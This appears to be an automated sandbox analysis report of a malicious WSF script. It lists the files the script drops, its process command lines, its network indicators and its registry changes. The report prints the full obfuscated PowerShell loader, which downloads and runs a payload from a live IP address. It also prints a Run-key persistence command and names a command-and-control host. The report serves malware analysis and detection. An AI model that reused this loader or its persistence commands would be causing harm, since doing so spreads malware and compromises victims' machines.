Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
rOferta_SKGNMECLemnedefinitionen353523577.wsf
|
XML 1.0 document, ASCII text, with very long lines (336), with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Roaming\mvourhjs.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\json[1].json
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_55dvwptc.llq.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m4xp1nt5.3em.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uito114p.1i1.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zoco44qv.bpu.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Sneglefart.Glo
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\rOferta_SKGNMECLemnedefinitionen353523577.wsf"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Filstandarder = 1;$Uroglena='Substrin';$Uroglena+='g';Function
Sarpedon($Historicoprophetic){$Nonmobile=$Historicoprophetic.Length-$Filstandarder;For($Hyletoner=4; $Hyletoner -lt $Nonmobile;
$Hyletoner+=(5)){$Rhythms+=$Historicoprophetic.$Uroglena.Invoke($Hyletoner, $Filstandarder);}$Rhythms;}function Bussemnd($revisionsinstituts){.
($Koketten) ($revisionsinstituts);}$Wheens=Sarpedon 'S.ikMOpsgoOrphz MapiIn.al.reelAguraNona/Spid5Indp. sy0Angi T.ef(R ktWRecoiDyknn
CoddCarbo,etywChecsCalc TeetNPareTRepl Unf 1Wint0Judo.Erma0Pign;Tilr oxoWBoliiArnonfimr6Desi4S,rv;,and olkxForr6F,la4 .ep;
Sup ServrB hevClaw:Reva1Gr,n2Brac1Halo.lept0Poic)s.ep VolaG Mi.eKhmecPhotkCra oFora/Yok 2File0Sgen1Dupl0 Va.0To,e1Ench0Fern1Peri
o haF,ophiL.ngrBur.eFleefMeseoDekaxFran/Bias1H.te2Kand1Alph.Term0Opla ';$Coeducationalism=Sarpedon 'forfUUn.esBeewe dlirBor.-
StaA AdvgPol,eVin,nKlgetVejs ';$skppeskn=Sarpedon ' lodh,orst.ultt NedpJust: ,ym/Fru /Unes8 La 7 Tel.Reli1Conc2Nons1P.ot.
Ans1Kanv0 ede5Damp.ph r1Matr6Chan3Beha/ CouBIndfe,owelUeueyFortvDa.neAmpesAfto2N,np4 App2 M,r.Non,hUdkehAgg,kSop. ';$hyperaktivitet=Sarpedon
'Poly> tue ';$Koketten=Sarpedon 'Bunki At.eOv rxAuto ';$Brugermssige = Sarpedon ',daae C,lcfrithMedio and ,eva% nda,agop.ortpMacrdReviaL,vntK
lia oku%Paus\MellS PronJujueRotogSpullPerieValvfPolyaEpaprHydrtOpi..EngeGTil lJmspoBge, Tge&Nong&dime Putoe hatcUnrehperioSpi,
Bedu$.pro ';Bussemnd (Sarpedon 'Sort$Fremg AuslDomfoPhilbShataTrevlInde:Fo.lKBrataH,mia ,orrMusidEupae.ordsFlek=G,an(BefrcEn
pmPseudEque urn/R dacE,cu Pend$ GemBRul,rAntiu F.rgH gte Hy.rYankmOutpsElecs rteiFatcgNon.e sto)Forr ');Bussemnd (Sarpedon
'Span$.yangFluelSardoMalebKonsaTeknl Amt:SengS lu,t,atorEklee Sann E.tgMatteUddak TigoSkabrrandenoncnUn dePepp=Slag$Subss
Ar kSpispTuftpRke eKodrs Gehk ,etnFrys.ShavsDemopLongl JuviAflotFo s(Proc$TaphhFarsyHattpPreoe Gerr PosaE,idkKisstannuiNonmvRtssiAscetHawkeVelutEpit)V.rs
');$skppeskn=$Strengekorene[0];Bussemnd (Sarpedon 'r te$SusbgPak l ElloAdvibProga OpelK,nt:By,tTF acoChorsButisMysteHalvhUnheoUngkvCopseIndbd
russtota=TilvNOmrye PubwPse -PhonOEpitbTra,jHardeReamcWh.ttBest RondS Be.ystips PertomgreJoinmAm.i. ArbN iffe ,let,ens. conWExc.eS
ntb GedCOve,lSpriiGumme DatnB cktRaad ');Bussemnd (Sarpedon 'Sani$Cla,TNumsoFejlshymnsPe.ge Anhh Foro ubov DeceLamidAflysUdfl.nedgHSvikeRomaaU,dedDicteUninrImpisSkul[Cl.v$
tynCFinaoOpskeD crdUpupu .ricSelva MdetPa liVinkoknognL,msaAn,tl Optiuntrs Adsm.aff] Ra,=ra.p$bleeWMandhK.mieDiseeCananStabs.oom
');$fantasises=Sarpedon 'UnstT B,noSulfsAnsksEmbee T,lhTesko,ollvHandeNumidAtlasDeta.,ituDGrapoK rtw,yhen,perlBrdtoBad.aTrandWeinF
IndiGuttl Ch.e Red(Troi$StemsLeafkGge,pDo,apDataeBjersScorkObs,nTe.s,Prei$MezcO GulvRadieTurbr,ordfTypheSahaaUrovrnrmefPreau
AftlProdn .veePress,roas Und7Skri9Ring)Fje, ';$fantasises=$Kaardes[1]+$fantasises;$Overfearfulness79=$Kaardes[0];Bussemnd
(Sarpedon 'Flex$B.rggJentlMatroAnkybSigraKommlSk,l:ChesNtripeImpodTugtlTernaBraig Pirt Mar=Lab.(StanTRidge Fres S mtTotr-We
dPs laaNonetSov htame M.tr$Dis,Oevanv,heieTmm rOpstf F.oeDiseaRoomrRubefWarluSodalBa lnTviveEndos Pins Sth7supe9Gru.) U.d
');while (!$Nedlagt) {Bussemnd (Sarpedon ' For$CajugPiral rihoAnstbCampaRhodl and:tidsJ Fe eSissrDragnH stgpro,iDelstPolttPon
eDocorVidesEksteTernnFor gSv.neSolen AnceMe a=Cog.$ B it SchrSrstu PepeRed, ') ;Bussemnd $fantasises;Bussemnd (Sarpedon 'StatS
WortByggaxen.r ,tat Rej-PokeSTumol aueRefreSmaapOnom Lsm.4Demo ');Bussemnd (Sarpedon ',roi$Tyf gmuzzlAnfao.ptib SonaCocclS,iv:SyssNShrieMed
dF,eklOmflaappegA.but lem=Raag(Pse.TConseAnnss Duetgast-DeliPFoneaKapitA.kehhusk Dy.k$ proODiskvImmueHundrSub,fmilieUninaHei
rGoalf ,efu,rbelPensnNe rebedss.pers.osn7tach9Mona) De ') ;Bussemnd (Sarpedon ' Bis$ ontg cutlPoecojgerbTrekaDaimlRegr:SlgtS
FruyGildn.ulpiTof,nTubbgYohisApadh NedaMnstlmisclLyseeBelerCommnDia,eTynd=B ne$EucrgAfstllunaoEndob YaraChail fe,:Ta,dKMor,abraveDeltmR.gnpBegrehelboSnipeAntir.uncnBygge
Lav+Chad+Hypo%M rg$PereSFl pt StarRingeT,ppnSkbngStr eBestkIsraoDi.qr Hete rdnN ale Kap.BlokcTommoTempu UmanDdfdt Cam ')
;$skppeskn=$Strengekorene[$Syningshallerne];}Bussemnd (Sarpedon 'Shal$DespgCorol FodoNonpb AbdaSemilmoda: TviCFortoAbsemvi.upS,leoParanModieSupen
KirtHi maChecl rav .os=Cory LaroGSlogeOenst Com-MiceCEl.aoBemjn ,nttLefteSt.mnTr.btOrds Ditm$AcoeOStrevEpiceJoggrudstfBereeVensaH,ndrH.idfalaruBetilViabnVindeR,ffscoprs,eka7Fore9
Fle ');Bussemnd (Sarpedon ' Uni$ mycgin slMiniolivebFl ea UnelTand:R.liO VisvIsoleDek.rSocisLnpaeC lln slisUdsgiZo.rbAfs.l.ugmeLdre
Coun=Lave Marl[UndeSCreayG.nes ,fstPl.seNglem.lev..oluC .uboSovjn.onivCypre OxirPa,ttSkov]foed:Omsk: garFFordrPillo ThemAphoBOxycaJ,nnsButtePape6card4
.msSTjentEfterForsiCalan AntgWhos(Iagt$ KakCChanoHeuamUntrp Couo Ma nEgnseB.ugn Plat S.raForrl .om)Real ');Bussemnd (Sarpedon
'Invu$ bifg Su,lPar,oTritbparaaVejblAn e:GodtNcurioSkamnThi,d GeniJulelUnsiaEcontFrenaStrkbMattlOut e Hor Skor= Skj Dite[FornSThioyhiersDi.it
lite Aurmford.Did TLayseDelixP.ritTomo. CorECon.n.lencPlotoFuncdPyrgi Fl nI.eagA.ti]Kryd:Star: lokABoobSParsCMo,eI Ly,IOpt,.PedeGRuthepanct
StiSAurotPublr AmbiNonbnIch g Bef(Chyl$.andOSkyfvFrijePinkr .jes DiaeLouvn omps.amoi,houbDe tl B teIsoc)Genu ');Bussemnd (Sarpedon
' Pen$Provg.laylImproLibebTryka s rlInte:Cen DSkovaAscacoutftUbesy UnplAnaloMaimn EksovermmR,styLavi2Lu.r0Deni4Gul,=Stop$UredNMakaoGor.nK.lidRo.tiSy
tlSo.aaNonitE,teaReprb NonlParaeN.bl.De isi.dau DiabStibsB.llt manr N,ni He nSureg Nem(Takk2 sti8Absa0Vire4,ami5Equi6Forl,
Boo2 L.p7 The2 Kli2skgl5 .ag)Frui ');Bussemnd $Dactylonomy204;"
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sneglefart.Glo && echo $"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Filstandarder = 1;$Uroglena='Substrin';$Uroglena+='g';Function
Sarpedon($Historicoprophetic){$Nonmobile=$Historicoprophetic.Length-$Filstandarder;For($Hyletoner=4; $Hyletoner -lt $Nonmobile;
$Hyletoner+=(5)){$Rhythms+=$Historicoprophetic.$Uroglena.Invoke($Hyletoner, $Filstandarder);}$Rhythms;}function Bussemnd($revisionsinstituts){.
($Koketten) ($revisionsinstituts);}$Wheens=Sarpedon 'S.ikMOpsgoOrphz MapiIn.al.reelAguraNona/Spid5Indp. sy0Angi T.ef(R ktWRecoiDyknn
CoddCarbo,etywChecsCalc TeetNPareTRepl Unf 1Wint0Judo.Erma0Pign;Tilr oxoWBoliiArnonfimr6Desi4S,rv;,and olkxForr6F,la4 .ep;
Sup ServrB hevClaw:Reva1Gr,n2Brac1Halo.lept0Poic)s.ep VolaG Mi.eKhmecPhotkCra oFora/Yok 2File0Sgen1Dupl0 Va.0To,e1Ench0Fern1Peri
o haF,ophiL.ngrBur.eFleefMeseoDekaxFran/Bias1H.te2Kand1Alph.Term0Opla ';$Coeducationalism=Sarpedon 'forfUUn.esBeewe dlirBor.-
StaA AdvgPol,eVin,nKlgetVejs ';$skppeskn=Sarpedon ' lodh,orst.ultt NedpJust: ,ym/Fru /Unes8 La 7 Tel.Reli1Conc2Nons1P.ot.
Ans1Kanv0 ede5Damp.ph r1Matr6Chan3Beha/ CouBIndfe,owelUeueyFortvDa.neAmpesAfto2N,np4 App2 M,r.Non,hUdkehAgg,kSop. ';$hyperaktivitet=Sarpedon
'Poly> tue ';$Koketten=Sarpedon 'Bunki At.eOv rxAuto ';$Brugermssige = Sarpedon ',daae C,lcfrithMedio and ,eva% nda,agop.ortpMacrdReviaL,vntK
lia oku%Paus\MellS PronJujueRotogSpullPerieValvfPolyaEpaprHydrtOpi..EngeGTil lJmspoBge, Tge&Nong&dime Putoe hatcUnrehperioSpi,
Bedu$.pro ';Bussemnd (Sarpedon 'Sort$Fremg AuslDomfoPhilbShataTrevlInde:Fo.lKBrataH,mia ,orrMusidEupae.ordsFlek=G,an(BefrcEn
pmPseudEque urn/R dacE,cu Pend$ GemBRul,rAntiu F.rgH gte Hy.rYankmOutpsElecs rteiFatcgNon.e sto)Forr ');Bussemnd (Sarpedon
'Span$.yangFluelSardoMalebKonsaTeknl Amt:SengS lu,t,atorEklee Sann E.tgMatteUddak TigoSkabrrandenoncnUn dePepp=Slag$Subss
Ar kSpispTuftpRke eKodrs Gehk ,etnFrys.ShavsDemopLongl JuviAflotFo s(Proc$TaphhFarsyHattpPreoe Gerr PosaE,idkKisstannuiNonmvRtssiAscetHawkeVelutEpit)V.rs
');$skppeskn=$Strengekorene[0];Bussemnd (Sarpedon 'r te$SusbgPak l ElloAdvibProga OpelK,nt:By,tTF acoChorsButisMysteHalvhUnheoUngkvCopseIndbd
russtota=TilvNOmrye PubwPse -PhonOEpitbTra,jHardeReamcWh.ttBest RondS Be.ystips PertomgreJoinmAm.i. ArbN iffe ,let,ens. conWExc.eS
ntb GedCOve,lSpriiGumme DatnB cktRaad ');Bussemnd (Sarpedon 'Sani$Cla,TNumsoFejlshymnsPe.ge Anhh Foro ubov DeceLamidAflysUdfl.nedgHSvikeRomaaU,dedDicteUninrImpisSkul[Cl.v$
tynCFinaoOpskeD crdUpupu .ricSelva MdetPa liVinkoknognL,msaAn,tl Optiuntrs Adsm.aff] Ra,=ra.p$bleeWMandhK.mieDiseeCananStabs.oom
');$fantasises=Sarpedon 'UnstT B,noSulfsAnsksEmbee T,lhTesko,ollvHandeNumidAtlasDeta.,ituDGrapoK rtw,yhen,perlBrdtoBad.aTrandWeinF
IndiGuttl Ch.e Red(Troi$StemsLeafkGge,pDo,apDataeBjersScorkObs,nTe.s,Prei$MezcO GulvRadieTurbr,ordfTypheSahaaUrovrnrmefPreau
AftlProdn .veePress,roas Und7Skri9Ring)Fje, ';$fantasises=$Kaardes[1]+$fantasises;$Overfearfulness79=$Kaardes[0];Bussemnd
(Sarpedon 'Flex$B.rggJentlMatroAnkybSigraKommlSk,l:ChesNtripeImpodTugtlTernaBraig Pirt Mar=Lab.(StanTRidge Fres S mtTotr-We
dPs laaNonetSov htame M.tr$Dis,Oevanv,heieTmm rOpstf F.oeDiseaRoomrRubefWarluSodalBa lnTviveEndos Pins Sth7supe9Gru.) U.d
');while (!$Nedlagt) {Bussemnd (Sarpedon ' For$CajugPiral rihoAnstbCampaRhodl and:tidsJ Fe eSissrDragnH stgpro,iDelstPolttPon
eDocorVidesEksteTernnFor gSv.neSolen AnceMe a=Cog.$ B it SchrSrstu PepeRed, ') ;Bussemnd $fantasises;Bussemnd (Sarpedon 'StatS
WortByggaxen.r ,tat Rej-PokeSTumol aueRefreSmaapOnom Lsm.4Demo ');Bussemnd (Sarpedon ',roi$Tyf gmuzzlAnfao.ptib SonaCocclS,iv:SyssNShrieMed
dF,eklOmflaappegA.but lem=Raag(Pse.TConseAnnss Duetgast-DeliPFoneaKapitA.kehhusk Dy.k$ proODiskvImmueHundrSub,fmilieUninaHei
rGoalf ,efu,rbelPensnNe rebedss.pers.osn7tach9Mona) De ') ;Bussemnd (Sarpedon ' Bis$ ontg cutlPoecojgerbTrekaDaimlRegr:SlgtS
FruyGildn.ulpiTof,nTubbgYohisApadh NedaMnstlmisclLyseeBelerCommnDia,eTynd=B ne$EucrgAfstllunaoEndob YaraChail fe,:Ta,dKMor,abraveDeltmR.gnpBegrehelboSnipeAntir.uncnBygge
Lav+Chad+Hypo%M rg$PereSFl pt StarRingeT,ppnSkbngStr eBestkIsraoDi.qr Hete rdnN ale Kap.BlokcTommoTempu UmanDdfdt Cam ')
;$skppeskn=$Strengekorene[$Syningshallerne];}Bussemnd (Sarpedon 'Shal$DespgCorol FodoNonpb AbdaSemilmoda: TviCFortoAbsemvi.upS,leoParanModieSupen
KirtHi maChecl rav .os=Cory LaroGSlogeOenst Com-MiceCEl.aoBemjn ,nttLefteSt.mnTr.btOrds Ditm$AcoeOStrevEpiceJoggrudstfBereeVensaH,ndrH.idfalaruBetilViabnVindeR,ffscoprs,eka7Fore9
Fle ');Bussemnd (Sarpedon ' Uni$ mycgin slMiniolivebFl ea UnelTand:R.liO VisvIsoleDek.rSocisLnpaeC lln slisUdsgiZo.rbAfs.l.ugmeLdre
Coun=Lave Marl[UndeSCreayG.nes ,fstPl.seNglem.lev..oluC .uboSovjn.onivCypre OxirPa,ttSkov]foed:Omsk: garFFordrPillo ThemAphoBOxycaJ,nnsButtePape6card4
.msSTjentEfterForsiCalan AntgWhos(Iagt$ KakCChanoHeuamUntrp Couo Ma nEgnseB.ugn Plat S.raForrl .om)Real ');Bussemnd (Sarpedon
'Invu$ bifg Su,lPar,oTritbparaaVejblAn e:GodtNcurioSkamnThi,d GeniJulelUnsiaEcontFrenaStrkbMattlOut e Hor Skor= Skj Dite[FornSThioyhiersDi.it
lite Aurmford.Did TLayseDelixP.ritTomo. CorECon.n.lencPlotoFuncdPyrgi Fl nI.eagA.ti]Kryd:Star: lokABoobSParsCMo,eI Ly,IOpt,.PedeGRuthepanct
StiSAurotPublr AmbiNonbnIch g Bef(Chyl$.andOSkyfvFrijePinkr .jes DiaeLouvn omps.amoi,houbDe tl B teIsoc)Genu ');Bussemnd (Sarpedon
' Pen$Provg.laylImproLibebTryka s rlInte:Cen DSkovaAscacoutftUbesy UnplAnaloMaimn EksovermmR,styLavi2Lu.r0Deni4Gul,=Stop$UredNMakaoGor.nK.lidRo.tiSy
tlSo.aaNonitE,teaReprb NonlParaeN.bl.De isi.dau DiabStibsB.llt manr N,ni He nSureg Nem(Takk2 sti8Absa0Vire4,ami5Equi6Forl,
Boo2 L.p7 The2 Kli2skgl5 .ag)Frui ');Bussemnd $Dactylonomy204;"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sneglefart.Glo && echo $"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "nyerhvervelsen" /t REG_EXPAND_SZ
/d "%Impopular% -w 1 $monotonicity=(Get-ItemProperty -Path 'HKCU:\Weariest\').Amperian;%Impopular% ($monotonicity)"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\reg.exe
|
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "nyerhvervelsen" /t REG_EXPAND_SZ /d "%Impopular% -w 1 $monotonicity=(Get-ItemProperty
-Path 'HKCU:\Weariest\').Amperian;%Impopular% ($monotonicity)"
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
jgbours284hawara01.duckdns.org
|
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
http://geoplugin.net/json.gp
|
178.237.33.50
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://geoplugin.net/json.gpg
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
http://87.121.105.163/Belyves242.hhkXR
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.binPPv
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://87.121.105.163
|
unknown
|
||
|
http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.binm
|
unknown
|
||
|
http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.binFokusGulduelvalenza.it/DtExZZndAxdvvlCKCcIVF127.bi
|
unknown
|
||
|
http://geoplugin.net/json.gpw
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://87.121.105.163/Belyves242.hhk
|
87.121.105.163
|
||
|
http://geoplugin.net/
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.bini
|
unknown
|
||
|
http://87.121.105.163/Belyves242.hhkP
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://87.121.H
|
unknown
|
||
|
http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.bin
|
87.121.105.163
|
There are 17 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
jgbours284hawara01.duckdns.org
|
45.88.90.110
|
|
|
|
geoplugin.net
|
178.237.33.50
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
45.88.90.110
|
jgbours284hawara01.duckdns.org
|
Bulgaria
|
|
|
|
87.121.105.163
|
unknown
|
Bulgaria
|
||
|
178.237.33.50
|
geoplugin.net
|
Netherlands
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\Weariest
|
Amperian
|
||
|
HKEY_CURRENT_USER\Environment
|
Impopular
|
||
|
HKEY_CURRENT_USER\SOFTWARE\jnbcourg-8XH6PE
|
exepath
|
||
|
HKEY_CURRENT_USER\SOFTWARE\jnbcourg-8XH6PE
|
licence
|
||
|
HKEY_CURRENT_USER\SOFTWARE\jnbcourg-8XH6PE
|
time
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
nyerhvervelsen
|
There are 10 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
8650000
|
direct allocation
|
page execute and read and write
|
|
|
|
99BB000
|
direct allocation
|
page execute and read and write
|
|
|
|
23D6A311000
|
trusted library allocation
|
page read and write
|
|
|
|
312C000
|
heap
|
page read and write
|
|
|
|
5AC6000
|
trusted library allocation
|
page read and write
|
|
|
|
7FFD34770000
|
trusted library allocation
|
page read and write
|
||
|
23D5B4AD000
|
trusted library allocation
|
page read and write
|
||
|
28AF000
|
stack
|
page read and write
|
||
|
23C5093B000
|
heap
|
page read and write
|
||
|
7266DEE000
|
stack
|
page read and write
|
||
|
23C4ECA5000
|
heap
|
page read and write
|
||
|
7620000
|
trusted library allocation
|
page read and write
|
||
|
23D72850000
|
heap
|
page read and write
|
||
|
6EC5000
|
heap
|
page read and write
|
||
|
86E0000
|
direct allocation
|
page read and write
|
||
|
23C50949000
|
heap
|
page read and write
|
||
|
6D40000
|
direct allocation
|
page read and write
|
||
|
23C50DDC000
|
heap
|
page read and write
|
||
|
23C4EE37000
|
heap
|
page read and write
|
||
|
23D5A852000
|
trusted library allocation
|
page read and write
|
||
|
23C4EE30000
|
heap
|
page read and write
|
||
|
4640000
|
heap
|
page readonly
|
||
|
7480000
|
trusted library allocation
|
page read and write
|
||
|
2C60000
|
heap
|
page read and write
|
||
|
23C50DC0000
|
heap
|
page read and write
|
||
|
73F8000
|
trusted library allocation
|
page read and write
|
||
|
8DF0000
|
direct allocation
|
page execute and read and write
|
||
|
2CF2000
|
trusted library allocation
|
page read and write
|
||
|
750E000
|
stack
|
page read and write
|
||
|
721C000
|
heap
|
page read and write
|
||
|
D6461DD000
|
stack
|
page read and write
|
||
|
23D58670000
|
heap
|
page read and write
|
||
|
23C5093C000
|
heap
|
page read and write
|
||
|
23C50924000
|
heap
|
page read and write
|
||
|
470E000
|
stack
|
page read and write
|
||
|
23D728F3000
|
heap
|
page read and write
|
||
|
7FFD34780000
|
trusted library allocation
|
page read and write
|
||
|
23D58645000
|
heap
|
page read and write
|
||
|
2D90000
|
heap
|
page read and write
|
||
|
7FFD34890000
|
trusted library allocation
|
page execute and read and write
|
||
|
23D5A126000
|
heap
|
page read and write
|
||
|
2C3E000
|
stack
|
page read and write
|
||
|
7FFD34970000
|
trusted library allocation
|
page read and write
|
||
|
2BE0000
|
heap
|
page read and write
|
||
|
2CC9000
|
trusted library allocation
|
page read and write
|
||
|
23D5A240000
|
heap
|
page execute and read and write
|
||
|
23C4EE35000
|
heap
|
page read and write
|
||
|
23C4EC9C000
|
heap
|
page read and write
|
||
|
23C4EBEA000
|
heap
|
page read and write
|
||
|
7FFD34940000
|
trusted library allocation
|
page execute and read and write
|
||
|
22120000
|
heap
|
page read and write
|
||
|
85ED000
|
stack
|
page read and write
|
||
|
7FFD34921000
|
trusted library allocation
|
page read and write
|
||
|
86D0000
|
direct allocation
|
page read and write
|
||
|
23D586DD000
|
heap
|
page read and write
|
||
|
23D5A290000
|
heap
|
page execute and read and write
|
||
|
23D7285E000
|
heap
|
page read and write
|
||
|
23C4EE3A000
|
heap
|
page read and write
|
||
|
23D58580000
|
heap
|
page read and write
|
||
|
23D726B1000
|
heap
|
page read and write
|
||
|
27AE000
|
stack
|
page read and write
|
||
|
23D5862B000
|
heap
|
page read and write
|
||
|
7FFD349A0000
|
trusted library allocation
|
page read and write
|
||
|
D6465FF000
|
stack
|
page read and write
|
||
|
23D58603000
|
heap
|
page read and write
|
||
|
23D7262D000
|
heap
|
page read and write
|
||
|
74CE000
|
stack
|
page read and write
|
||
|
23D5A067000
|
heap
|
page execute and read and write
|
||
|
7060000
|
heap
|
page read and write
|
||
|
23C50949000
|
heap
|
page read and write
|
||
|
23D58960000
|
trusted library allocation
|
page read and write
|
||
|
23C4EC24000
|
heap
|
page read and write
|
||
|
23D5862D000
|
heap
|
page read and write
|
||
|
2D0C000
|
heap
|
page read and write
|
||
|
23D59FC0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD349D0000
|
trusted library allocation
|
page read and write
|
||
|
23D5BF19000
|
trusted library allocation
|
page read and write
|
||
|
23D6A2B0000
|
trusted library allocation
|
page read and write
|
||
|
23C4EC24000
|
heap
|
page read and write
|
||
|
31F0000
|
heap
|
page read and write
|
||
|
7440000
|
trusted library allocation
|
page read and write
|
||
|
23C50968000
|
heap
|
page read and write
|
||
|
82CC000
|
stack
|
page read and write
|
||
|
23C4ECAB000
|
heap
|
page read and write
|
||
|
23D58975000
|
heap
|
page read and write
|
||
|
23D58631000
|
heap
|
page read and write
|
||
|
7FFD3482C000
|
trusted library allocation
|
page execute and read and write
|
||
|
5C2B000
|
remote allocation
|
page execute and read and write
|
||
|
7FFD34A60000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34930000
|
trusted library allocation
|
page execute and read and write
|
||
|
23C4EB80000
|
heap
|
page read and write
|
||
|
23C50A81000
|
heap
|
page read and write
|
||
|
7FFD34A70000
|
trusted library allocation
|
page read and write
|
||
|
27C0000
|
heap
|
page read and write
|
||
|
23C4ECDC000
|
heap
|
page read and write
|
||
|
23C50920000
|
heap
|
page read and write
|
||
|
7FFD34A10000
|
trusted library allocation
|
page read and write
|
||
|
267D000
|
stack
|
page read and write
|
||
|
23D5A115000
|
heap
|
page read and write
|
||
|
23D5AAA2000
|
trusted library allocation
|
page read and write
|
||
|
23C50949000
|
heap
|
page read and write
|
||
|
8027000
|
stack
|
page read and write
|
||
|
2478B154000
|
heap
|
page read and write
|
||
|
23C4ECBC000
|
heap
|
page read and write
|
||
|
6DA0000
|
direct allocation
|
page read and write
|
||
|
22580000
|
direct allocation
|
page read and write
|
||
|
46C0000
|
heap
|
page execute and read and write
|
||
|
23D72648000
|
heap
|
page read and write
|
||
|
6D70000
|
direct allocation
|
page read and write
|
||
|
7470000
|
trusted library allocation
|
page read and write
|
||
|
6E50000
|
direct allocation
|
page read and write
|
||
|
80E0000
|
heap
|
page read and write
|
||
|
6C9E000
|
stack
|
page read and write
|
||
|
2D00000
|
heap
|
page read and write
|
||
|
6DC0000
|
direct allocation
|
page read and write
|
||
|
23C4ECDC000
|
heap
|
page read and write
|
||
|
72AF000
|
